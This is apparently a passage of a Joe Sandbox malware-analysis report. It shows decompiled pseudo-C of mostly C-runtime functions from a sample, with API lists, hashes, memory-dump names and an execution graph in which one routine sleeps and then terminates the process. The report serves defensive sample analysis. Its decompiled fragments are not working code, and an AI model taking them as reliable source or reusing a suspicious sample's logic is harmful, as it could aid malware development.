                        • __amsg_exit.LIBCMT ref: 0040E95B
                        • __lock.LIBCMT ref: 0040E96B
                        • InterlockedDecrement.KERNEL32(?), ref: 0040E988
                        • InterlockedIncrement.KERNEL32(00B21860), ref: 0040E9B3
                        Memory Dump Source
                        • Source File: 00000000.00000002.310974634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.310970737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.310996168.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311006705.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311013666.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311028215.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311033356.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                        • String ID:
                        • API String ID: 4271482742-0
                        • Opcode ID: 516cf4ae0b6e82707ae2d5a8868951b720f2ae201203581f27c7b5bbac0e48e2
                        • Instruction ID: ab0f9b78bd71dce74febf2d25f83fab80e53a4f08a0c435d7ef074ac4792bfe4
                        • Opcode Fuzzy Hash: 516cf4ae0b6e82707ae2d5a8868951b720f2ae201203581f27c7b5bbac0e48e2
                        • Instruction Fuzzy Hash: 1B01C8B1906625DBC761AB2B9945B9A7360AF04754F04443FE800772D1CF3C6C61CBDD
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 41%
                        			E0040617D() {
                        				intOrPtr* _t10;
                        				intOrPtr _t13;
                        				void* _t15;
                        				void* _t21;
                        				void* _t22;
                        				void* _t23;
                        				intOrPtr _t24;
                        				void* _t26;
                        
                        				_push(0xc);
                        				_push(0x416d00);
                        				_t8 = E00408168(_t15, _t22, _t23);
                        				_t24 =  *((intOrPtr*)(_t26 + 8));
                        				if(_t24 == 0) {
                        					L9:
                        					return E004081AD(_t8);
                        				}
                        				if( *0x4462bc != 3) {
                        					_push(_t24);
                        					L7:
                        					if(HeapFree( *0x443328, 0, ??) == 0) {
                        						_t10 = E0040747B();
                        						 *_t10 = E00407439(GetLastError());
                        					}
                        					goto L9;
                        				}
                        				E00407670(_t15, _t21, _t22, 4);
                        				 *(_t26 - 4) =  *(_t26 - 4) & 0x00000000;
                        				_t13 = E004076A3(_t24);
                        				 *((intOrPtr*)(_t26 - 0x1c)) = _t13;
                        				if(_t13 != 0) {
                        					_push(_t24);
                        					_push(_t13);
                        					E004076D3();
                        				}
                        				 *(_t26 - 4) = 0xfffffffe;
                        				_t8 = E004061D3();
                        				if( *((intOrPtr*)(_t26 - 0x1c)) != 0) {
                        					goto L9;
                        				} else {
                        					_push( *((intOrPtr*)(_t26 + 8)));
                        					goto L7;
                        				}
                        			}











                        0x0040617d
                        0x0040617f
                        0x00406184
                        0x00406189
                        0x0040618e
                        0x00406205
                        0x0040620a
                        0x0040620a
                        0x00406197
                        0x004061dc
                        0x004061dd
                        0x004061ed
                        0x004061ef
                        0x00406202
                        0x00406204
                        0x00000000
                        0x004061ed
                        0x0040619b
                        0x004061a1
                        0x004061a6
                        0x004061ac
                        0x004061b1
                        0x004061b3
                        0x004061b4
                        0x004061b5
                        0x004061bb
                        0x004061bc
                        0x004061c3
                        0x004061cc
                        0x00000000
                        0x004061ce
                        0x004061ce
                        0x00000000
                        0x004061ce

                        APIs
                        • __lock.LIBCMT ref: 0040619B
                          • Part of subcall function 00407670: __mtinitlocknum.LIBCMT ref: 00407686
                          • Part of subcall function 00407670: __amsg_exit.LIBCMT ref: 00407692
                          • Part of subcall function 00407670: EnterCriticalSection.KERNEL32(?,?,?,004113F5,00000004,004171A8,0000000C,0040D6D2,00000001,?,00000000,00000000,00000000,?,0040BD22,00000001), ref: 0040769A
                        • ___sbh_find_block.LIBCMT ref: 004061A6
                        • ___sbh_free_block.LIBCMT ref: 004061B5
                        • HeapFree.KERNEL32(00000000,00000001,00416D00,0000000C,00407651,00000000,00416E70,0000000C,0040768B,00000001,?,?,004113F5,00000004,004171A8,0000000C), ref: 004061E5
                        • GetLastError.KERNEL32(?,004113F5,00000004,004171A8,0000000C,0040D6D2,00000001,?,00000000,00000000,00000000,?,0040BD22,00000001,00000214), ref: 004061F6
                        Memory Dump Source
                        • Source File: 00000000.00000002.310974634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.310970737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.310996168.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311006705.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311013666.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311028215.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311033356.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                        • String ID:
                        • API String ID: 2714421763-0
                        • Opcode ID: bab60c97d3e5b7b0894e35c47f5d3705e1febb4fd3c64c9ae3a48da791fb1e2d
                        • Instruction ID: a04e48afcaf651abc37a7683dd01ee9a190dc6d2bc241c94ba87dbcfe25802c0
                        • Opcode Fuzzy Hash: bab60c97d3e5b7b0894e35c47f5d3705e1febb4fd3c64c9ae3a48da791fb1e2d
                        • Instruction Fuzzy Hash: A201A271D04211AAEB207FB2AC06B5F3A649F02764F12403FF4527A1D2DA3D9991CB9E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 65%
                        			E00410C88() {
                        				signed long long _v12;
                        				signed int _v20;
                        				signed long long _v28;
                        				signed char _t8;
                        
                        				_t8 = GetModuleHandleA("KERNEL32");
                        				if(_t8 == 0) {
                        					L6:
                        					_v20 =  *0x403638;
                        					_v28 =  *0x403630;
                        					asm("fsubr qword [ebp-0x18]");
                        					_v12 = _v28 / _v20 * _v20;
                        					asm("fld1");
                        					asm("fcomp qword [ebp-0x8]");
                        					asm("fnstsw ax");
                        					if((_t8 & 0x00000005) != 0) {
                        						return 0;
                        					} else {
                        						return 1;
                        					}
                        				} else {
                        					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
                        					if(__eax == 0) {
                        						goto L6;
                        					} else {
                        						_push(0);
                        						return __eax;
                        					}
                        				}
                        			}







                        0x00410c8d
                        0x00410c95
                        0x00410cac
                        0x00410c58
                        0x00410c61
                        0x00410c6d
                        0x00410c70
                        0x00410c73
                        0x00410c75
                        0x00410c78
                        0x00410c7d
                        0x00410c87
                        0x00410c7f
                        0x00410c83
                        0x00410c83
                        0x00410c97
                        0x00410c9d
                        0x00410ca5
                        0x00000000
                        0x00410ca7
                        0x00410ca7
                        0x00410cab
                        0x00410cab
                        0x00410ca5

                        APIs
                        • GetModuleHandleA.KERNEL32(KERNEL32,0040AE7A), ref: 00410C8D
                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00410C9D
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.310974634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.310970737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.310996168.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311006705.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311013666.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311028215.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311033356.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: AddressHandleModuleProc
                        • String ID: IsProcessorFeaturePresent$KERNEL32
                        • API String ID: 1646373207-3105848591
                        • Opcode ID: 849291338ce3d63dde9b087aa9bd3a28552f9dc7da4fe46b9535fd13aa592c58
                        • Instruction ID: 2cc87d07ba03b1b782b82d160500d17f1eff63234b3d3f6bb45c75640bbf4e22
                        • Opcode Fuzzy Hash: 849291338ce3d63dde9b087aa9bd3a28552f9dc7da4fe46b9535fd13aa592c58
                        • Instruction Fuzzy Hash: 2FF03030A00A09E2DF142FA1AE0A6AF7E7CBB80702F9105A1D1D6B01D4EF7581F5C69A
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E0040DEDE(void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
                        				intOrPtr _v8;
                        				signed int _v12;
                        				char _v20;
                        				signed int _t54;
                        				intOrPtr _t56;
                        				int _t57;
                        				int _t58;
                        				signed short* _t59;
                        				short* _t60;
                        				int _t65;
                        				char* _t73;
                        
                        				_t73 = _a8;
                        				if(_t73 == 0 || _a12 == 0) {
                        					L5:
                        					return 0;
                        				} else {
                        					if( *_t73 != 0) {
                        						E0040904E( &_v20, __edi, _a16);
                        						if( *((intOrPtr*)(_v20 + 0x14)) != 0) {
                        							if(E0040E00F( *_t73 & 0x000000ff,  &_v20) == 0) {
                        								if(MultiByteToWideChar( *(_v20 + 4), 9, _t73, 1, _a4, 0 | _a4 != 0x00000000) != 0) {
                        									L10:
                        									if(_v8 != 0) {
                        										 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                        									}
                        									return 1;
                        								}
                        								L21:
                        								_t54 = E0040747B();
                        								 *_t54 = 0x2a;
                        								if(_v8 != 0) {
                        									_t54 = _v12;
                        									 *(_t54 + 0x70) =  *(_t54 + 0x70) & 0xfffffffd;
                        								}
                        								return _t54 | 0xffffffff;
                        							}
                        							_t56 = _v20;
                        							_t65 =  *(_t56 + 0xac);
                        							if(_t65 <= 1 || _a12 < _t65) {
                        								L17:
                        								if(_a12 <  *(_t56 + 0xac) || _t73[1] == 0) {
                        									goto L21;
                        								} else {
                        									goto L19;
                        								}
                        							} else {
                        								_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t73, _t65, _a4, 0 | _a4 != 0x00000000);
                        								_t56 = _v20;
                        								if(_t58 != 0) {
                        									L19:
                        									_t57 =  *(_t56 + 0xac);
                        									if(_v8 == 0) {
                        										return _t57;
                        									}
                        									 *(_v12 + 0x70) =  *(_v12 + 0x70) & 0xfffffffd;
                        									return _t57;
                        								}
                        								goto L17;
                        							}
                        						}
                        						_t59 = _a4;
                        						if(_t59 != 0) {
                        							 *_t59 =  *_t73 & 0x000000ff;
                        						}
                        						goto L10;
                        					} else {
                        						_t60 = _a4;
                        						if(_t60 != 0) {
                        							 *_t60 = 0;
                        						}
                        						goto L5;
                        					}
                        				}
                        			}














                        0x0040dee8
                        0x0040deef
                        0x0040df06
                        0x00000000
                        0x0040def6
                        0x0040def8
                        0x0040df12
                        0x0040df1d
                        0x0040df4f
                        0x0040dfed
                        0x0040df2d
                        0x0040df30
                        0x0040df35
                        0x0040df35
                        0x00000000
                        0x0040df3b
                        0x0040dfaf
                        0x0040dfaf
                        0x0040dfb4
                        0x0040dfbd
                        0x0040dfbf
                        0x0040dfc2
                        0x0040dfc2
                        0x00000000
                        0x0040dfc6
                        0x0040df51
                        0x0040df54
                        0x0040df5d
                        0x0040df84
                        0x0040df8d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x0040df64
                        0x0040df77
                        0x0040df7f
                        0x0040df82
                        0x0040df94
                        0x0040df94
                        0x0040df9d
                        0x0040df0b
                        0x0040df0b
                        0x0040dfa6
                        0x00000000
                        0x0040dfa6
                        0x00000000
                        0x0040df82
                        0x0040df5d
                        0x0040df1f
                        0x0040df24
                        0x0040df2a
                        0x0040df2a
                        0x00000000
                        0x0040defa
                        0x0040defa
                        0x0040deff
                        0x0040df03
                        0x0040df03
                        0x00000000
                        0x0040deff
                        0x0040def8

                        APIs
                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0040DF12
                        • __isleadbyte_l.LIBCMT ref: 0040DF46
                        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,?,00000000,00000000,?,?,?,6E49C677,00000000,00000000,?), ref: 0040DF77
                        • MultiByteToWideChar.KERNEL32(?,00000009,00000000,00000001,00000000,00000000,?,?,?,6E49C677,00000000,00000000,?), ref: 0040DFE5
                        Memory Dump Source
                        • Source File: 00000000.00000002.310974634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.310970737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.310996168.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311006705.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311013666.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311028215.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311033356.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                        • String ID:
                        • API String ID: 3058430110-0
                        • Opcode ID: efa1c4807faf2de5249cdde7e0ad398816fe84a95a35b08c13bc6bbfd9111492
                        • Instruction ID: 3364307831111e090e90a540cb8b838cdfe72a3ac2f9eac63f3894a4aac76be5
                        • Opcode Fuzzy Hash: efa1c4807faf2de5249cdde7e0ad398816fe84a95a35b08c13bc6bbfd9111492
                        • Instruction Fuzzy Hash: 0D31CE31E00247EFCB20EFA4C884AAA3BA1AF01310F14857AF562AB2D1D334DD54DB59
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00410B74(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
                        				intOrPtr _t25;
                        				void* _t26;
                        				void* _t28;
                        
                        				_t25 = _a16;
                        				if(_t25 == 0x65 || _t25 == 0x45) {
                        					_t26 = E00410465(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                        					goto L9;
                        				} else {
                        					_t34 = _t25 - 0x66;
                        					if(_t25 != 0x66) {
                        						__eflags = _t25 - 0x61;
                        						if(_t25 == 0x61) {
                        							L7:
                        							_t26 = E00410555(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
                        						} else {
                        							__eflags = _t25 - 0x41;
                        							if(__eflags == 0) {
                        								goto L7;
                        							} else {
                        								_t26 = E00410A7A(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
                        							}
                        						}
                        						L9:
                        						return _t26;
                        					} else {
                        						return E004109BF(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
                        					}
                        				}
                        			}






                        0x00410b79
                        0x00410b7f
                        0x00410bf2
                        0x00000000
                        0x00410b86
                        0x00410b86
                        0x00410b89
                        0x00410ba4
                        0x00410ba7
                        0x00410bc7
                        0x00410bd9
                        0x00410ba9
                        0x00410ba9
                        0x00410bac
                        0x00000000
                        0x00410bae
                        0x00410bc0
                        0x00410bc0
                        0x00410bac
                        0x00410bf7
                        0x00410bfb
                        0x00410b8b
                        0x00410ba3
                        0x00410ba3
                        0x00410b89

                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.310974634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.310970737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.310996168.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311006705.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311013666.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311028215.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311033356.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                        • String ID:
                        • API String ID: 3016257755-0
                        • Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                        • Instruction ID: a00fe7094c665b1aa83b003f8bcb39f1fd7a9ba829c258cca2bc7f148fee25eb
                        • Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
                        • Instruction Fuzzy Hash: 3A117E3204414AFBCF125ED4CC51CEE3F22BB18358F588416FA5859131C77AD9F1AB89
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 90%
                        			E0040F09B(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                        				signed int _t13;
                        				intOrPtr _t27;
                        				intOrPtr _t29;
                        				void* _t30;
                        				void* _t31;
                        
                        				_t31 = __eflags;
                        				_t26 = __edi;
                        				_t25 = __edx;
                        				_t22 = __ebx;
                        				_push(0xc);
                        				_push(0x417148);
                        				E00408168(__ebx, __edi, __esi);
                        				_t29 = E0040BD70(__ebx, __edx, _t31);
                        				_t13 =  *0x418d34; // 0xfffffffe
                        				if(( *(_t29 + 0x70) & _t13) == 0) {
                        					L6:
                        					E00407670(_t22, _t25, _t26, 0xc);
                        					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
                        					_t8 = _t29 + 0x6c; // 0x6c
                        					_t27 =  *0x418e18; // 0x418d40
                        					 *((intOrPtr*)(_t30 - 0x1c)) = E0040F05D(_t8, _t27);
                        					 *(_t30 - 4) = 0xfffffffe;
                        					E0040F105();
                        				} else {
                        					_t33 =  *((intOrPtr*)(_t29 + 0x6c));
                        					if( *((intOrPtr*)(_t29 + 0x6c)) == 0) {
                        						goto L6;
                        					} else {
                        						_t29 =  *((intOrPtr*)(E0040BD70(_t22, __edx, _t33) + 0x6c));
                        					}
                        				}
                        				if(_t29 == 0) {
                        					E00406BE8(0x20);
                        				}
                        				return E004081AD(_t29);
                        			}








                        0x0040f09b
                        0x0040f09b
                        0x0040f09b
                        0x0040f09b
                        0x0040f09b
                        0x0040f09d
                        0x0040f0a2
                        0x0040f0ac
                        0x0040f0ae
                        0x0040f0b6
                        0x0040f0da
                        0x0040f0dc
                        0x0040f0e2
                        0x0040f0e6
                        0x0040f0e9
                        0x0040f0f4
                        0x0040f0f7
                        0x0040f0fe
                        0x0040f0b8
                        0x0040f0b8
                        0x0040f0bc
                        0x00000000
                        0x0040f0be
                        0x0040f0c3
                        0x0040f0c3
                        0x0040f0bc
                        0x0040f0c8
                        0x0040f0cc
                        0x0040f0d1
                        0x0040f0d9

                        APIs
                        • __getptd.LIBCMT ref: 0040F0A7
                          • Part of subcall function 0040BD70: __getptd_noexit.LIBCMT ref: 0040BD73
                          • Part of subcall function 0040BD70: __amsg_exit.LIBCMT ref: 0040BD80
                        • __getptd.LIBCMT ref: 0040F0BE
                        • __amsg_exit.LIBCMT ref: 0040F0CC
                        • __lock.LIBCMT ref: 0040F0DC
                        Memory Dump Source
                        • Source File: 00000000.00000002.310974634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.310970737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.310996168.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311006705.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311013666.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311028215.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311033356.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: __amsg_exit__getptd$__getptd_noexit__lock
                        • String ID:
                        • API String ID: 3521780317-0
                        • Opcode ID: 8ca7ef0c350fca566ba6684c216ff16df0ed23dafa0c33d837cdfb98a3a2b658
                        • Instruction ID: 925462649c196d7ab1147969d9d15b3965408171c252b3ccfbaa8ed3a22b351d
                        • Opcode Fuzzy Hash: 8ca7ef0c350fca566ba6684c216ff16df0ed23dafa0c33d837cdfb98a3a2b658
                        • Instruction Fuzzy Hash: FAF06D32A44B14CAD730BB65D802B8A73A0AF00764F10413FA841BB6D2DB7CAC45CA9E
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E0041614E(void* __ebx, void* __edx, void* __edi, intOrPtr* __esi, void* __eflags) {
                        				intOrPtr _t17;
                        				intOrPtr* _t28;
                        				void* _t29;
                        
                        				_t30 = __eflags;
                        				_t28 = __esi;
                        				_t26 = __edx;
                        				_t19 = __ebx;
                        				 *((intOrPtr*)(__edi - 4)) =  *((intOrPtr*)(_t29 - 0x24));
                        				E00415C16(__ebx, __edx, __edi, __eflags,  *((intOrPtr*)(_t29 - 0x28)));
                        				 *((intOrPtr*)(E0040BD70(__ebx, __edx, __eflags) + 0x88)) =  *((intOrPtr*)(_t29 - 0x2c));
                        				_t17 = E0040BD70(_t19, _t26, _t30);
                        				 *((intOrPtr*)(_t17 + 0x8c)) =  *((intOrPtr*)(_t29 - 0x30));
                        				if( *__esi == 0xe06d7363 &&  *((intOrPtr*)(__esi + 0x10)) == 3) {
                        					_t17 =  *((intOrPtr*)(__esi + 0x14));
                        					if(_t17 == 0x19930520 || _t17 == 0x19930521 || _t17 == 0x19930522) {
                        						if( *((intOrPtr*)(_t29 - 0x34)) == 0) {
                        							_t37 =  *((intOrPtr*)(_t29 - 0x1c));
                        							if( *((intOrPtr*)(_t29 - 0x1c)) != 0) {
                        								_t17 = E00415BEF(_t37,  *((intOrPtr*)(_t28 + 0x18)));
                        								_t38 = _t17;
                        								if(_t17 != 0) {
                        									_push( *((intOrPtr*)(_t29 + 0x10)));
                        									_push(_t28);
                        									return E00415EE6(_t38);
                        								}
                        							}
                        						}
                        					}
                        				}
                        				return _t17;
                        			}






                        0x0041614e
                        0x0041614e
                        0x0041614e
                        0x0041614e
                        0x00416151
                        0x00416157
                        0x00416165
                        0x0041616b
                        0x00416173
                        0x0041617f
                        0x00416187
                        0x0041618f
                        0x004161a3
                        0x004161a5
                        0x004161a9
                        0x004161ae
                        0x004161b4
                        0x004161b6
                        0x004161b8
                        0x004161bb
                        0x00000000
                        0x004161c2
                        0x004161b6
                        0x004161a9
                        0x004161a3
                        0x0041618f
                        0x004161c3

                        APIs
                          • Part of subcall function 00415C16: __getptd.LIBCMT ref: 00415C1C
                          • Part of subcall function 00415C16: __getptd.LIBCMT ref: 00415C2C
                        • __getptd.LIBCMT ref: 0041615D
                          • Part of subcall function 0040BD70: __getptd_noexit.LIBCMT ref: 0040BD73
                          • Part of subcall function 0040BD70: __amsg_exit.LIBCMT ref: 0040BD80
                        • __getptd.LIBCMT ref: 0041616B
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.310974634.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.310970737.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.310996168.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311006705.0000000000419000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311013666.000000000042E000.00000008.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311028215.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.311033356.0000000000449000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Similarity
                        • API ID: __getptd$__amsg_exit__getptd_noexit
                        • String ID: csm
                        • API String ID: 803148776-1018135373
                        • Opcode ID: a935c30cd55411eed2351ce7d8e9c1ad7b12a7df9e4901bfa9168f7baf4b6cfa
                        • Instruction ID: 474831be7a2f2d2468342213cfcbba1cf13fe85f3b37322c86b277925fab3e0f
                        • Opcode Fuzzy Hash: a935c30cd55411eed2351ce7d8e9c1ad7b12a7df9e4901bfa9168f7baf4b6cfa
                        • Instruction Fuzzy Hash: 54012834800705EECF389F25D440AEEB3B5EF50311F15442FE44156792DB38DAC5CA99
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Execution Graph

                        Execution Coverage:6.1%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:63.2%
                        Total number of Nodes:19
                        Total number of Limit Nodes:0
                        execution_graph 668 402ad1 669 402ad2 668->669 671 402b56 669->671 672 40180c 669->672 673 40181b 672->673 674 40183e Sleep 673->674 676 401859 674->676 675 40186a NtTerminateProcess 677 401876 675->677 676->675 677->671 682 401818 683 40181b 682->683 684 40183e Sleep 683->684 686 401859 684->686 685 40186a NtTerminateProcess 687 401876 685->687 686->685 688 402a9d 689 402ad2 688->689 690 40180c 2 API calls 689->690 691 402b56 689->691 690->691

                        Callgraph

                        • Executed
                        • Not Executed
                        • Opacity -> Relevance
                        • Disassembly available
                        callgraph 0 Function_00401246 1 Function_00401748 2 Function_00401BC9 3 Function_00402ACE 53 Function_0040180C 3->53 4 Function_004011D0 5 Function_00402AD1 5->53 6 Function_00401DD3 7 Function_00401AD5 8 Function_004011D7 9 Function_00402B58 10 Function_00402DD8 11 Function_00402E59 12 Function_004023DB 13 Function_00402E5C 14 Function_004027DC 15 Function_0040195D 16 Function_0040275E 17 Function_004010DF 18 Function_00402DE2 19 Function_00401064 20 Function_004016E4 21 Function_00402B66 22 Function_00401D66 23 Function_00402F6A 24 Function_0040136B 25 Function_004011EB 26 Function_00402D6E 27 Function_004025EF 28 Function_00402BEF 29 Function_00402E75 30 Function_00402D75 31 Function_00402575 32 Function_004015F5 33 Function_00402DF5 34 Function_00402CF7 35 Function_00402D79 36 Function_004017F9 37 Function_0040187A 38 Function_00402B7A 39 Function_0040157F 40 Function_00402E7F 41 Function_004013FF 42 Function_00401381 43 Function_00402102 44 Function_00401E82 45 Function_00402B82 46 Function_00402E83 47 Function_00401884 48 Function_00401705 49 Function_00402706 50 Function_00401786 51 Function_00401686 52 Function_0040188B 53->42 54 Function_0040138C 55 Function_00401A8C 56 Function_00402993 57 Function_00402E14 58 Function_00401894 59 Function_00402794 60 Function_00402E94 61 Function_00401715 62 Function_00401297 63 Function_00401818 63->42 64 Function_00401898 65 Function_00402E98 66 Function_0040131A 67 Function_0040259B 68 Function_00402A9D 68->53 69 Function_0040281D 70 Function_0040139D 71 Function_00402E20 72 Function_004013A0 73 Function_00401822 73->42 74 Function_00401826 74->42 75 Function_00401427 76 Function_0040212C 77 Function_00401D31 78 Function_00401D32 79 Function_00401CB2 80 Function_00402D33 80->4 81 Function_00401834 81->42 82 Function_00402635 83 Function_00402DB9 84 Function_00401D3D

                        Control-flow Graph

                        C-Code - Quality: 23%
                        			E0040180C(void* __eflags, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                        				char _v8;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				void* _t11;
                        				void* _t16;
                        				intOrPtr* _t17;
                        				void* _t19;
                        				void* _t20;
                        				void* _t21;
                        
                        				_t22 = __eflags;
                        				L00401140(0x183e, _t16, _t20, _t21, __eflags, __fp0);
                        				_t17 = _a4;
                        				Sleep(0x1388);
                        				_t11 = E00401381(_t19, _t22, _t17, _a8, _a12,  &_v8); // executed
                        				if(_t11 != 0) {
                        					_push(_a16);
                        					_push(_v8);
                        					_push(_t11);
                        					_push(_t17); // executed
                        					L00401455(0x60, _t19, _t20); // executed
                        				}
                        				 *_t17(0xffffffff, 0); // executed
                        				_t17 = _t17 + 0x60;
                        				_push(0x60);
                        				asm("pushad");
                        				__ecx =  *__esp;
                        				__esp = __esp + 4;
                        				return __eax;
                        			}














                        0x0040180c
                        0x00401839
                        0x0040183e
                        0x00401846
                        0x00401854
                        0x0040185b
                        0x0040185d
                        0x00401860
                        0x00401863
                        0x00401864
                        0x00401865
                        0x00401865
                        0x0040186e
                        0x0040187a
                        0x0040188a
                        0x0040188b
                        0x0040188c
                        0x0040188f
                        0x004018a2

                        APIs
                        • Sleep.KERNELBASE(00001388), ref: 00401846
                        • NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 0040186E
                        Memory Dump Source
                        • Source File: 00000001.00000002.395991467.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
